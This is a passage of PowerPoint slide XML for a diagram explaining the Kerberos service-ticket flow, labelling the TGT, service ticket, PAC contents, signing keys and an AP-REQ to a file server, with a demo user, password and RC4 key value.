              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE90B0B7-F471-CF82-745C-6F830760AF12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="2"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="9226208" y="4291678"/>
            <a:ext cx="1211639" cy="1310355"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF">
                <a:lumMod val="75000"/>
              </a:sysClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D36D95-C3C2-9294-674D-47EC64043662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8928909" y="4905970"/>
            <a:ext cx="1072729" cy="307777"/>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white">
                    <a:lumMod val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5. AP-REQ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B18C5393-D052-4C6D-C8F8-7F1122463AA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1201526" y="1656883"/>
            <a:ext cx="1741699" cy="662297"/>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err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>allan.marshall</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Awesomesauce123</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 2" descr="male user icon by acspike">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44BF692A-32DF-152B-E4CD-4ACE7669B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4" y="1772645"/>
            <a:ext cx="874233" cy="87423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759FF64-EA0F-1383-27B0-AC198760F3BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3772047" y="3882278"/>
            <a:ext cx="3993224" cy="1840709"/>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Privilege Attribute Certificate (PAC)</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black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Username: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>allan.marshall</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="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prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SID: S-1-5-21-409 … &lt;snip&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Groups: Administrators … &lt;snip&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{113EDDBA-73DB-FDCF-EF53-01A2B85550D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="831618" y="3206333"/>
            <a:ext cx="6948143" cy="409874"/>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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TGT - Encrypted using KDC LT key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9CC1A12-F985-D00C-961A-3D1F368E8E56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3767943" y="5380746"/>
            <a:ext cx="3997327" cy="337336"/>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Signed using KDC LT Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF81C2AF-4C28-257A-BCEA-EC3C35FCCF1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3769996" y="5037836"/>
            <a:ext cx="3997327" cy="337336"/>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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Signed using Target LT Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Picture 2" descr="Simple gold key by milovanderlinden">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{954132DF-89AA-A859-539C-BD2E3C1F15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7144796" y="3271928"/>
            <a:ext cx="561715" cy="2808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 seal by yves_guillou">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B0774D-34A6-77D9-DAFD-BD7FB5CA4C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4803" y="5067915"/>
            <a:ext cx="313224" cy="43148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 seal by yves_guillou">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F70E767-F055-1531-FCFC-A4172AD127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1743" y="5469256"/>
            <a:ext cx="313224" cy="431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1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6FE7-5215-1AB6-F63C-8C2E2DB822C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Authentication: Service Ticket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D981232-2803-ACAE-97BE-C47073BC09FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3162557" y="2245630"/>
            <a:ext cx="1762246" cy="52848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white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rc4_hmac_md5</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD832FEB-5E63-B016-37D0-602974F9804E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5063866" y="2241492"/>
            <a:ext cx="3134581" cy="528486"/>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300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>56</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>8399599</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>f1be</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>040128</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>b1dd</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>9623</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-BE" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>29</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Arrow: Curved Down 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D8BF113-D4F9-DDD2-0163-B6E02C784CEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="679343" y="2173411"/>
            <a:ext cx="2550785" cy="424439"/>
          </a:xfrm>
          <a:prstGeom prst="curvedDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 94881"/>
              <a:gd name="adj3" fmla="val 2500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BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96E1BFED-9740-3E45-4398-F22C5475614B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10503968" y="1365971"/>
            <a:ext cx="1394844" cy="2102107"/>
            <a:chOff x="10446699" y="1473785"/>
            <a:chExt cx="1130788" cy="1938154"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 2" descr="Server by cyberscooty">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E38E31C0-CF72-F843-33B7-472EF4EAC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699" y="1473785"/>
              <a:ext cx="737960" cy="12222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AA65DFF-FB62-08EC-011C-F2D3835454DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10623454" y="2902107"/>
              <a:ext cx="807040" cy="509832"/>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KDC</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 2" descr="Book by MajinCline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28E0949A-A9E1-06A7-43CE-D7C93BE26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0449" y="2118230"/>
              <a:ext cx="807038" cy="76222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Flowchart: Alternate Process 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29E4C55E-CB2A-144D-5300-420A6FA5EF3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8813274" y="2739476"/>
            <a:ext cx="829353" cy="374077"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">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white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TGT</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Flowchart: Alternate Process 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBE4D2DF-D5B9-5EB3-D1C2-08B02C8C3FB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8789651" y="3838261"/>
            <a:ext cx="829353" cy="526452"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ST (TGS)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EE7ADB9-F020-9176-FDA2-875D8CB2B45E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10518800" y="4072804"/>
            <a:ext cx="962992" cy="1204619"/>
            <a:chOff x="10798720" y="4898278"/>
            <a:chExt cx="1168889" cy="1474940"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Picture 2" descr="Server by cyberscooty">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3B1CC9A-55EE-A426-0B89-848255ED5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720" y="4898278"/>
              <a:ext cx="737960" cy="12222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older by computating">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83226B15-B30E-CACD-1FA6-B00563F03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86" y="5548595"/>
              <a:ext cx="824623" cy="82462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C5956A9D-77BD-38BC-4178-60053B7582A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10518799" y="5315636"/>
            <a:ext cx="962992" cy="529043"/>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File Server</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Connector: Curved 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED7A12F4-C1D0-0362-0627-E0F4AB417317}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8198447" y="1499536"/>
            <a:ext cx="2070022" cy="1006199"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF">
                <a:lumMod val="75000"/>
              </a:sysClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
